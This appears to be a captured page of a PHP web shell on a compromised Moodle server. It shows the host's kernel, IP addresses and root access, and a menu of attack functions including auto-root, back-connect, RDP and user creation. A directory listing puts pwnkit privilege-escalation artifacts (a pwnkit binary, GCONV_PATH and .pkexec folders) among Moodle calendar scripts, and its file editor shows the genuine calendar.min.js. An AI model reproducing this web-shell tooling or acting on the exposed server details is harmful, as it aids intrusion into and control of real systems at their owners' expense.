Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
calendar /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
calendar.min.js
4.76
KB
-rwxrwxrwx
calendar.min.js.map
13.79
KB
-rwxrwxrwx
calendar_filter.min.js
1.85
KB
-rwxrwxrwx
calendar_filter.min.js.map
5.39
KB
-rwxrwxrwx
calendar_mini.min.js
1.96
KB
-rwxrwxrwx
calendar_mini.min.js.map
5.6
KB
-rwxrwxrwx
calendar_threemonth.min.js
2.83
KB
-rwxrwxrwx
calendar_threemonth.min.js.map
8.11
KB
-rwxrwxrwx
calendar_view.min.js
1.9
KB
-rwxrwxrwx
calendar_view.min.js.map
5.4
KB
-rwxrwxrwx
crud.min.js
4.29
KB
-rwxrwxrwx
crud.min.js.map
12.86
KB
-rwxrwxrwx
drag_drop_data_store.min.js
1.68
KB
-rwxrwxrwx
drag_drop_data_store.min.js.ma...
6.8
KB
-rwxrwxrwx
event_form.min.js
1.32
KB
-rwxrwxrwx
event_form.min.js.map
4.11
KB
-rwxrwxrwx
events.min.js
870
B
-rwxrwxrwx
events.min.js.map
2.07
KB
-rwxrwxrwx
modal_delete.min.js
1.98
KB
-rwxrwxrwx
modal_delete.min.js.map
5.22
KB
-rwxrwxrwx
modal_event_form.min.js
5.38
KB
-rwxrwxrwx
modal_event_form.min.js.map
19.64
KB
-rwxrwxrwx
month_navigation_drag_drop.min...
2.51
KB
-rwxrwxrwx
month_navigation_drag_drop.min...
9.17
KB
-rwxrwxrwx
month_view_drag_drop.min.js
4.91
KB
-rwxrwxrwx
month_view_drag_drop.min.js.ma...
17.36
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
repository.min.js
2.58
KB
-rwxrwxrwx
repository.min.js.map
7
KB
-rwxrwxrwx
selectors.min.js
1.51
KB
-rwxrwxrwx
selectors.min.js.map
3.68
KB
-rwxrwxrwx
summary_modal.min.js
3.14
KB
-rwxrwxrwx
summary_modal.min.js.map
9.73
KB
-rwxrwxrwx
view_manager.min.js
11.91
KB
-rwxrwxrwx
view_manager.min.js.map
22.7
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : calendar.min.js
/** * This module is the highest level module for the calendar. It is * responsible for initialising all of the components required for * the calendar to run. It also coordinates the interaction between * components by listening for and responding to different events * triggered within the calendar UI. * * @module core_calendar/calendar * @package core_calendar * @copyright 2017 Simey Lameze <simey@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define("core_calendar/calendar",["jquery","core/ajax","core/str","core/templates","core/notification","core/custom_interaction_events","core/modal_events","core/modal_factory","core_calendar/modal_event_form","core_calendar/summary_modal","core_calendar/repository","core_calendar/events","core_calendar/view_manager","core_calendar/crud","core_calendar/selectors"],(function($,Ajax,Str,Templates,Notification,CustomEvents,ModalEvents,ModalFactory,ModalEventForm,SummaryModal,CalendarRepository,CalendarEvents,CalendarViewManager,CalendarCrud,CalendarSelectors){var SELECTORS_DAY="[data-region='day']",SELECTORS_DAY_CONTENT="[data-region='day-content']",SELECTORS_LOADING_ICON=".loading-icon",SELECTORS_VIEW_DAY_LINK="[data-action='view-day-link']",SELECTORS_CALENDAR_MONTH_WRAPPER=".calendarwrapper",handleMoveEvent=function(e,eventId,originElement,destinationElement){var originTimestamp=null,destinationTimestamp=destinationElement.attr("data-day-timestamp");originElement&&(originTimestamp=originElement.attr("data-day-timestamp")),originElement&&originTimestamp==destinationTimestamp||Templates.render("core/loading",{}).then((function(html,js){destinationElement.find(SELECTORS_DAY_CONTENT).addClass("hidden"),Templates.appendNodeContents(destinationElement,html,js),originElement&&(originElement.find(SELECTORS_DAY_CONTENT).addClass("hidden"),Templates.appendNodeContents(originElement,html,js))})).then((function(){return CalendarRepository.updateEventStartDay(eventId,destinationTimestamp)})).then((function(){$("body").trigger(CalendarEvents.eventMoved,[eventId,originElement,destinationElement])})).always((function(){var destinationLoadingElement=destinationElement.find(SELECTORS_LOADING_ICON);if(destinationElement.find(SELECTORS_DAY_CONTENT).removeClass("hidden"),Templates.replaceNode(destinationLoadingElement,"",""),originElement){var originLoadingElement=originElement.find(SELECTORS_LOADING_ICON);originElement.find(SELECTORS_DAY_CONTENT).removeClass("hidden"),Templates.replaceNode(originLoadingElement,"","")}})).fail(Notification.exception)},registerEventListeners=function(root){root.on("click",SELECTORS_VIEW_DAY_LINK,(function(e){var dayLink=$(e.target),year=dayLink.data("year"),month=dayLink.data("month"),day=dayLink.data("day"),courseId=dayLink.data("courseid"),categoryId=dayLink.data("categoryid");CalendarViewManager.refreshDayContent(root,year,month,day,courseId,categoryId,root,"core_calendar/calendar_day").then((function(){e.preventDefault();var url="?view=day&time="+dayLink.data("timestamp");return window.history.pushState({},"",url)})).fail(Notification.exception)})),root.on("change",CalendarSelectors.elements.courseSelector,(function(){var courseId=$(this).val();CalendarViewManager.reloadCurrentMonth(root,courseId,null).then((function(){return root.find(CalendarSelectors.elements.courseSelector).val(courseId)})).fail(Notification.exception)}));var eventFormPromise=CalendarCrud.registerEventFormModal(root),contextId=$(SELECTORS_CALENDAR_MONTH_WRAPPER).data("context-id");!function(root,eventFormModalPromise){var body=$("body");body.on(CalendarEvents.created,(function(){CalendarViewManager.reloadCurrentMonth(root)})),body.on(CalendarEvents.deleted,(function(){CalendarViewManager.reloadCurrentMonth(root)})),body.on(CalendarEvents.updated,(function(){CalendarViewManager.reloadCurrentMonth(root)})),body.on(CalendarEvents.editActionEvent,(function(e,url){window.location.assign(url)})),body.on(CalendarEvents.moveEvent,handleMoveEvent),body.on(CalendarEvents.eventMoved,(function(){CalendarViewManager.reloadCurrentMonth(root)})),CalendarCrud.registerEditListeners(root,eventFormModalPromise)}(root,eventFormPromise),contextId&&root.on("click",SELECTORS_DAY,(function(e){var target=$(e.target);if(!target.is(SELECTORS_VIEW_DAY_LINK)){var startTime=$(this).attr("data-new-event-timestamp");eventFormPromise.then((function(modal){var wrapper=target.closest(CalendarSelectors.wrapper);modal.setCourseId(wrapper.data("courseid"));var categoryId=wrapper.data("categoryid");void 0!==categoryId&&modal.setCategoryId(categoryId),modal.setContextId(wrapper.data("contextId")),modal.setStartTime(startTime),modal.show()})).fail(Notification.exception),e.preventDefault()}}))};return{init:function(root){root=$(root),CalendarViewManager.init(root),registerEventListeners(root)}}})); //# sourceMappingURL=calendar.min.js.map
Close